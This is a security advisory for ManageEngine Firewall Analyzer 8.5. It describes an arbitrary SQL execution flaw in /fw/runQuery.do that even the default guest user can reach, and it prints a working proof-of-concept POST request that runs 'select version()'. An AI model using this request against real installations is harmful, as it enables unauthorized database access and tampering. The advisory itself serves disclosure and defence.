ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability

================================================================

================================================================

Information

------------------------------------------------

Vulnerability Type : ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability

Vulnerable Version : 8.5

Vendor Homepage: https://www.manageengine.com/products/firewall/download.html

CVE-ID :

Severity : High

Author – Sachin Wagh (@tiger_tigerboy)

Description

------------------------------------------------

ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software that helps network administrators to centrally collect,

archive, analyze their security device logs and generate forensic reports out of it.

The vulnerability exists due to an error in the RunQuerycommand. An authenticated, remote attacker could exploit

this vulnerability via a crafted POST request. An exploit could allow the attacker to execute arbitrary SQL queries on the underlying database server.

Every user has the ability to execute SQL queries through the "/fw/runQuery.do" script, including the default "guest" user.

Below is the POST request, executed as "guest":

POST /fw/runQuery.do HTTP/1.1

Host: localhost:8500

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://localhost:8500/fw/runQuery.do

Cookie: username=guest; password=8094789293; leftPanel=230px; JSESSIONID=3590F06EA06BBA9B0FC9A40405E1144F; JSESSIONIDSSO=96016151FC34CD1EA17192C6AF288A14; FWA_TABLE=TS

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 123

execute=true&DatabaseType=postgres&query=select version()